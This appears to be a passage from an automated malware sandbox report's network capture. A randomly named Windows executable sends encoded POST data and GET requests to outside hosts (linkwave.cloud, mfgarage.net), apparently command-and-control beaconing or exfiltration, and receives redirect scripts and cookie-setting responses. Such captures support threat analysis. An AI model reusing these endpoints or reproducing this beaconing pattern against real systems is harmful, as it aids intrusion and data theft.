                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 52 5f 78 58 72 41 3d 33 71 49 52 66 51 6c 2f 41 4b 64 6f 31 6d 79 55 75 4f 48 56 68 31 59 6a 62 5a 41 5a 7a 54 4c 59 5a 34 4e 6d 78 4a 6f 75 5a 44 73 74 38 6e 46 59 47 46 6d 66 4a 6a 7a 71 55 66 6b 36 56 45 6d 4c 38 31 76 35 6f 30 6c 46 5a 68 74 65 35 2b 67 44 78 2b 73 66 46 4a 7a 6e 39 76 32 38 47 2f 4a 32 66 72 39 42 77 41 31 71 77 57 76 39 62 31 32 65 72 43 41 6b 35 33 59 3d 26 6e 30 3d 6d 54 6b 38 75 34 6c 68 7a 62 6e 68 56 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.4497623.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:35.869275093 CEST772OUTPOST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 33 56 70 65 76 4d 74 50 77 44 53 55 74 71 36 66 74 79 52 55 35 5a 54 33 78 31 50 44 4f 54 67 59 6a 62 59 65 2b 57 66 41 7a 58 33 56 50 56 79 4e 57 65 55 78 59 44 66 47 37 4c 77 7a 42 45 6c 61 61 2f 33 76 35 57 66 72 2b 67 42 62 63 54 31 4e 52 75 31 32 62 4a 57 6b 63 6e 33 46 47 51 70 77 64 79 67 67 6d 6e 75 6e 76 33 48 47 53 68 48 4b 32 77 49 67 49 5a 34 67 68 6b 55 52 57 4f 37 37 71 34 70 77 33 41 6b 4a 4c 66 33 71 61 42 36 34 6e 36 74 46 41 6f 71 4d 2f 52 39 47 35 6a 33 59 78 56 57 66 74 76 6b 37 63 70 56 76 58 53 38 39 37 69 2b 4b 77 3d 3d
                                              Data Ascii: PR_xXrA=YTqtiDoowBcpM3VpevMtPwDSUtq6ftyRU5ZT3x1PDOTgYjbYe+WfAzX3VPVyNWeUxYDfG7LwzBElaa/3v5Wfr+gBbcT1NRu12bJWkcn3FGQpwdyggmnunv3HGShHK2wIgIZ4ghkURWO77q4pw3AkJLf3qaB64n6tFAoqM/R9G5j3YxVWftvk7cpVvXS897i+Kw==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.4497633.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:38.423007011 CEST792OUTPOST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 33 67 59 47 2f 59 52 63 75 66 44 7a 58 33 41 2f 56 33 54 6d 65 62 78 59 66 39 47 36 6e 77 7a 42 67 6c 61 65 7a 33 6f 49 57 63 74 2b 67 50 64 63 54 33 4a 52 75 31 32 62 4a 57 6b 59 32 51 46 47 49 70 77 73 43 67 68 45 50 74 37 2f 33 41 53 43 68 48 62 6d 77 4d 67 49 59 62 67 6c 6c 63 52 55 32 37 37 71 49 70 77 6d 41 6e 41 4c 66 78 6c 36 41 30 78 6d 72 37 4e 6a 46 79 42 75 70 7a 48 35 6e 31 55 58 45 4d 4f 63 4f 7a 70 63 4e 6d 79 51 62 49 77 34 66 33 52 79 48 69 69 77 6e 4e 76 32 4e 57 4f 45 77 5a 36 36 4a 44 53 37 77 3d
                                              Data Ascii: PR_xXrA=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD83gYG/YRcufDzX3A/V3TmebxYf9G6nwzBglaez3oIWct+gPdcT3JRu12bJWkY2QFGIpwsCghEPt7/3ASChHbmwMgIYbgllcRU277qIpwmAnALfxl6A0xmr7NjFyBupzH5n1UXEMOcOzpcNmyQbIw4f3RyHiiwnNv2NWOEwZ66JDS7w=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.4497643.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:40.968885899 CEST10874OUTPOST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 2f 67 59 77 7a 59 51 37 36 66 43 7a 58 33 63 76 56 32 54 6d 65 38 78 59 58 35 47 36 36 4e 7a 44 49 6c 61 37 76 33 70 36 75 63 34 4f 67 50 66 63 54 30 4e 52 75 61 32 59 68 53 6b 63 53 51 46 47 49 70 77 76 71 67 6b 6d 6e 74 35 2f 33 48 47 53 68 31 4b 32 77 6b 67 49 42 67 67 6c 68 4d 51 6c 57 37 37 4b 59 70 7a 55 59 6e 63 62 66 7a 78 61 42 70 78 6d 6d 6c 4e 69 70 2b 42 75 4d 59 48 37 37 31 46 44 42 4b 4b 34 2b 49 2f 4b 46 66 70 58 7a 59 37 49 36 30 66 55 6e 4c 69 68 7a 59 34 6c 46 66 4d 45 6f 63 2f 6f 30 49 47 75 6e 72 6b 53 75 4a 61 6d 59 70 30 6b 30 71 53 67 4c 6e 47 70 48 71 4b 5a 73 55 74 63 4a 7a 78 4c 38 59 30 32 31 73 69 31 4c 47 43 41 66 6f 56 6b 78 7a 65 42 49 67 74 59 58 78 57 44 41 42 62 69 4c 64 31 52 33 58 52 69 70 50 73 32 2b 30 55 71 70 36 68 6f 42 62 64 31 31 6d 6f 32 66 74 61 46 37 70 42 6a 56 6e 69 66 49 4f 64 63 6a 49 66 57 62 49 54 4c [TRUNCATED]
                                              Data Ascii: PR_xXrA=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD8/gYwzYQ76fCzX3cvV2Tme8xYX5G66NzDIla7v3p6uc4OgPfcT0NRua2YhSkcSQFGIpwvqgkmnt5/3HGSh1K2wkgIBgglhMQlW77KYpzUYncbfzxaBpxmmlNip+BuMYH771FDBKK4+I/KFfpXzY7I60fUnLihzY4lFfMEoc/o0IGunrkSuJamYp0k0qSgLnGpHqKZsUtcJzxL8Y021si1LGCAfoVkxzeBIgtYXxWDABbiLd1R3XRipPs2+0Uqp6hoBbd11mo2ftaF7pBjVnifIOdcjIfWbITLJNuUwMukMIdLwDpnhIffou0rHIqy1pavdljN/QxnrxU/CPxG0a5eLbgnwJvovQcCYnH/Eg1GyU37VhQhD6Em6Z2FMKm+HQmkPBApzSPUr9ZhD525tVMKHXFA9nUJIYTE/y+XntoNBQwtw08Uad/RWCvD4fg3LcDfmh9BN2U5zYKxeg7al3hPzPwr6sNvRQbEKkzcIn8rC0sqiyJ5LTKaLjIEZcuUy7zLQCASoDU+7vt5WowoJyBbBfQ7KHc5xfq8gNOOuVqEqX74gbRDItVDmvcGQWdwPXSfr4dPX2KXnNa8q74SI60BKNuZZ9yebY5qBQ1T5vPNNTWZ5CZSDNMviHFg0wvd+hcPVcSl0cZY9RK6JydX92Yfy1wWhtL7SepO3+lFk1Vv8/97lfYDdTHzYXv21iGIjLTJgpjc0M4GQ89jO+Bk4GCQIUB8Z+0BN8n1O7AJnO31k16Re1AdYDCjuRxe5/aMf2TYssV4QCPEOZRYqr466j3qqOVntVco9BiHDIzQLY3UE1qavhIcYzlClDu7gKL2KrIQ8QWrZJKf4CvEXhOLlLhgxHvbrFhBFULfLJhvSmA3/ZwCNN4Dc6xXqYrmofO+EEVGtBc58kFPTsuqSYZ6loOkyW1kSE9MvBatoNILcy03grqcXEQF96GU1Bbl0S3FCVj4S7 [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.4497653.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:43.515542030 CEST510OUTGET /al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.linkwave.cloud
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:48:43.979209900 CEST401INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 10:48:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 261
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 30 3d 6d 54 6b 38 75 34 6c 68 7a 62 6e 68 56 68 26 50 52 5f 78 58 72 41 3d 56 52 43 4e 68 30 4e 57 30 47 67 7a 58 6a 4a 39 50 64 6c 57 66 58 57 77 64 50 4b 70 42 76 36 4c 4b 36 67 69 2f 33 31 4f 49 2f 48 4c 56 7a 33 65 64 4c 4f 46 50 67 66 42 57 49 49 46 49 31 79 76 34 4b 6e 48 64 5a 2f 42 79 43 41 64 52 72 4f 77 32 39 43 70 73 38 67 70 64 4d 2b 78 59 54 6d 2f 70 35 30 66 35 64 7a 32 4d 56 51 4d 33 70 71 65 67 47 72 67 34 63 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.44976685.153.138.113803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:49.248893023 CEST766OUTPOST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 74 6e 67 58 65 67 70 41 34 64 79 48 31 67 48 31 72 36 56 36 45 4a 50 55 67 71 51 71 34 6c 41 58 66 66 51 62 30 4e 45 54 69 59 53 52 51 79 48 31 34 69 4e 34 4a 70 45 49 78 4f 65 53 6f 75 51 59 6e 35 48 6e 4e 69 46 62 52 49 61 72 65 46 46 73 56 6e 67 4c 32 58 50 46 56 72 6e 47 59 43 51 7a 58 68 63 6b 56 32 77 35 66 46 35 65 4f 58 2b 2f 64 39 36 67 68 36 41 4a 4e 32 4d 68 44 6c 33 70 58 67 4f 76 54 58 70 79 58 2f 46 61 65 52 37 64 44 62 6c 63 64 6c 69 31 36 6a 63 4d 59 72 6a 38 69 57 54 75 58 42 79 41 54 7a 46 59 4b 64 79 78 6c 41 43 6d 42 67 3d 3d
                                              Data Ascii: PR_xXrA=qx+IcpUA9j0ptngXegpA4dyH1gH1r6V6EJPUgqQq4lAXffQb0NETiYSRQyH14iN4JpEIxOeSouQYn5HnNiFbRIareFFsVngL2XPFVrnGYCQzXhckV2w5fF5eOX+/d96gh6AJN2MhDl3pXgOvTXpyX/FaeR7dDblcdli16jcMYrj8iWTuXByATzFYKdyxlACmBg==
                                              Sep 25, 2024 12:48:49.969575882 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=865; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=HltwPNFOWpRBPPYw66f3ea91; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=AtNgR5epvlGLyiE3BFkOnbedPRsfW-VTzUwmBuSSF5ZTf52Nzadk0NHzneFGhCyX9jaSOWc7Drz3vKzMyRB8JA; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=bwBFavERgUZ8k8kU22d6KYTtBhKoM7WI71i3i194JxHRIIQ_kPs73rZUOiUNgGwZIDMHuZ8NPZWBx2KF20o2-Q; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=B4kwnoMrphvuLTuCHRP-z_8p-pyjDsJ90piCZMAjOQGjk9uknEc3iATeRqDpk002IeSO5luEbzXJZHK6pDrHiHIbx_w1CyIwaNpaSc3kYU7cmKH4nphlfRoc2gvaeL2VqKyvCkZh0tfBmcafQjTLVPVx6ZceR06UPB6fNYma_9-gBs-Qfn0fam0SL1zRQ-GQ3alTTpCdum295MRErVOhNFT6osoN08De3Xyqkd0zDKUMYZk2sYFbbB9tIFVBZnV_fLG5ghqdGTb4CNB9BhQva-OvYcuj8LiqHcKJMIho5jKl1HDx1bS0VbqlFhOhcJvpuNGUvMmWI1
                                              Data Raw:
                                              Data Ascii:
                                              Sep 25, 2024 12:48:49.969595909 CEST407INData Raw: 55 4c 49 58 30 65 56 6a 75 6a 46 4b 62 59 38 51 31 74 54 79 4f 54 76 67 6c 2d 44 4a 7a 38 77 72 41 45 4d 51 4a 74 69 78 7a 76 64 67 59 32 2d 53 5a 32 75 53 79 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: ULIX0eVjujFKbY8Q1tTyOTvgl-DJz8wrAEMQJtixzvdgY2-SZ2uSy; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:49 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.44976785.153.138.113803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:51.792922020 CEST786OUTPOST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 55 58 66 2b 67 62 31 50 67 54 68 59 53 52 66 53 48 70 31 43 4e 7a 4a 70 59 41 78 4c 2b 53 6f 75 45 59 6e 38 6a 6e 4e 52 74 59 54 59 61 6c 54 6c 46 69 52 6e 67 4c 32 58 50 46 56 72 79 72 59 43 49 7a 58 77 73 6b 55 54 4d 36 57 6c 35 5a 47 33 2b 2f 5a 39 36 73 68 36 41 72 4e 33 67 50 44 6e 50 70 58 6b 4b 76 54 47 70 7a 64 2f 46 51 51 78 36 65 4b 5a 49 34 61 56 33 6a 38 7a 41 7a 56 61 58 35 75 77 43 30 47 77 54 58 42 7a 68 72 58 61 37 46 6f 44 2f 76 61 76 38 4d 6c 6a 6b 41 4b 6d 57 44 55 5a 38 64 76 4d 2f 46 64 4d 55 3d
                                              Data Ascii: PR_xXrA=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XUXf+gb1PgThYSRfSHp1CNzJpYAxL+SouEYn8jnNRtYTYalTlFiRngL2XPFVryrYCIzXwskUTM6Wl5ZG3+/Z96sh6ArN3gPDnPpXkKvTGpzd/FQQx6eKZI4aV3j8zAzVaX5uwC0GwTXBzhrXa7FoD/vav8MljkAKmWDUZ8dvM/FdMU=
                                              Sep 25, 2024 12:48:52.523732901 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=383; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=0ZaNZeUw1KpSto3R66f3ea94; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=OA_0GnEPk8o7kbqmxOQPWogk7KKnYdLrDv6Dj1rsFIh6wlzIBoAAbQtKEwpTn-Yv1v3CVAtVMvtg4R_YbTwgvg; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=4Tq_TwfCIKOBT0Kt3xXH2KRDwTCMXWGBIwCy1A7SB15if3rDlchzM5cMtpnnJNOx5Yl7LQpfu8JoX_aEGpktkA; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=-z_wSwLLY7z38KVTE3k1mBUxcPAXTFRH-sMfntPMWT9cJzPIPK9go99zKPpEQ63lLEtLRPUAsjCUa_6TBaQRkiS-wkZxJtl1BgR0HI8edpJTsYFlpi140KZdtJ-3D5nLbiNo66jfAdvjw4uC6gcxdrsgTh393D6q5nKtmAG5AQiVMq4OSnqSWXwgYRrCeDrGhWfXbWTjWpPiJf8cHBGJALYmpV7sMsmUPdbIRm4Wm8uOW42UmHiSGcHW8800-dX2sOLeOjnZq6cY4CFuNrbucF1KsH9DljcCxqlN06ItkykmxqvpPohVtuBBxKsBcA1kyvXE6gMdyg
                                              Data Raw:
                                              Data Ascii:
                                              Sep 25, 2024 12:48:52.523838043 CEST407INData Raw: 33 6a 36 59 59 6d 71 64 6a 63 32 4b 30 31 79 32 58 4e 4c 64 30 5f 55 33 64 31 44 61 63 55 51 70 44 4f 74 76 5a 70 63 6c 72 55 66 67 55 4a 73 50 6c 58 6a 5f 63 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: 3j6YYmqdjc2K01y2XNLd0_U3d1DacUQpDOtvZpclrUfgUJsPlXj_c; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:52 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.44976885.153.138.113803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:54.346404076 CEST10868OUTPOST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 4d 58 66 73 34 62 31 76 63 54 67 59 53 52 57 79 48 71 31 43 4e 71 4a 70 51 45 78 4c 7a 76 6f 71 30 59 68 61 76 6e 4c 67 74 59 5a 59 61 6c 61 46 46 6a 56 6e 67 6b 32 57 2b 4e 56 72 69 72 59 43 49 7a 58 79 30 6b 64 6d 77 36 51 6c 35 65 4f 58 2b 4a 64 39 36 41 68 36 59 52 4e 33 55 78 57 44 7a 70 5a 67 75 76 65 51 39 7a 65 66 46 65 54 78 36 38 4b 5a 45 6e 61 56 72 5a 38 77 63 5a 56 61 6a 35 2b 57 33 31 46 54 37 76 51 7a 70 71 41 4b 33 46 6b 51 50 52 62 2f 38 4e 74 52 51 70 49 69 65 65 65 49 73 54 31 2b 58 7a 43 70 6d 50 4f 33 30 53 4c 44 61 6d 4b 62 54 62 58 46 72 55 50 48 4b 65 76 36 35 4c 70 47 6a 46 41 4c 6f 47 37 37 6f 61 63 62 32 69 38 37 4c 32 6f 64 72 64 53 6a 72 37 4b 38 35 5a 6c 74 62 77 6e 4e 51 76 34 68 70 36 54 51 5a 52 2f 51 71 58 53 48 63 47 63 70 33 30 66 70 6a 74 4c 35 76 48 4e 36 46 2b 65 38 2b 52 76 38 4c 68 44 76 43 53 36 45 4d 48 6c 45 [TRUNCATED]
                                              Data Ascii: PR_xXrA=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XMXfs4b1vcTgYSRWyHq1CNqJpQExLzvoq0YhavnLgtYZYalaFFjVngk2W+NVrirYCIzXy0kdmw6Ql5eOX+Jd96Ah6YRN3UxWDzpZguveQ9zefFeTx68KZEnaVrZ8wcZVaj5+W31FT7vQzpqAK3FkQPRb/8NtRQpIieeeIsT1+XzCpmPO30SLDamKbTbXFrUPHKev65LpGjFALoG77oacb2i87L2odrdSjr7K85ZltbwnNQv4hp6TQZR/QqXSHcGcp30fpjtL5vHN6F+e8+Rv8LhDvCS6EMHlEiJqY+3kaCdijHR0+CM/ZqRlufycJGyGcdWDGe/CFMJfJaS72OpwFotnfQ9CEbQr9QYTOqMUCTOmq+8qU+sAkGtocE4gM/uRvzE/eTEg98zmqF2+arFamJGHe6BbDkdEDPWrT66O13OYN+a8u8nlbiOAaaY7GAjemc/L+O6DXrTqVIqc1tD5dB/7bFo3+RA4LXnF/npKTborRk+nlXI5qUewRVbdAtaL8Mmnxdps8GX6mGB0oqSIdYKXihgbKx51rkSGcEzSm88wJQgHemwCqeEn7n5ZY6dsUjfpXw9oFtT6b/YI4ZIdYIogmkxWkwFiHbJpLmgIAll7XADnNS9PdWaZK8qVA1WjYzbSuVHZXvgogFT1uZ6jiFSfkC0M7AQghw2HXXovYg+cKTKhL0pBoVuneo4ERI0SDBSZXWIHcwlJST+ohaCJjNnH0Uy7Jc9zJuF/VSKEWBgqnben4BKWqVlxbm9dFB5UMu0i1Y+L/tceAOkIxM1AoP4VDPN3zhl1s/PANTA2Ei2ye6ZI6iQWTO0hGz0bLvWh4DV3WlTXafTjuwA8qr8t8vCfNgy8iqyoaeJo+LNHeo7xwUD1ExkJ74qB6tuqEBOaSEHRtatko1A2ax+c5S0AYCuuCbDP0Pk533xzefFToRtGsAEUEeBOYkhwrkJqizuf+SV [TRUNCATED]
                                              Sep 25, 2024 12:48:55.213120937 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=537; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:55 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=i43QxKBVDlxRyuJX66f3ea97; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:55 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=hERC-8EAwqGT9wsa2866Um-eqxanlNF5C8YDmd5NylOb9KQAdn795bb89yWcwEK3W-h7uazf0badJy9CaVrQ8A; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:55 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=YvIoRwZXT3VFZpdu6bLU7-z6nBHrmxOAxPfcSj9PmBbB9R6C8q8FCDcar0ApeNY07wwkV89WZf6pcOicwufhtg; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:55 GMT; Path=/; Secure; SameSite=None
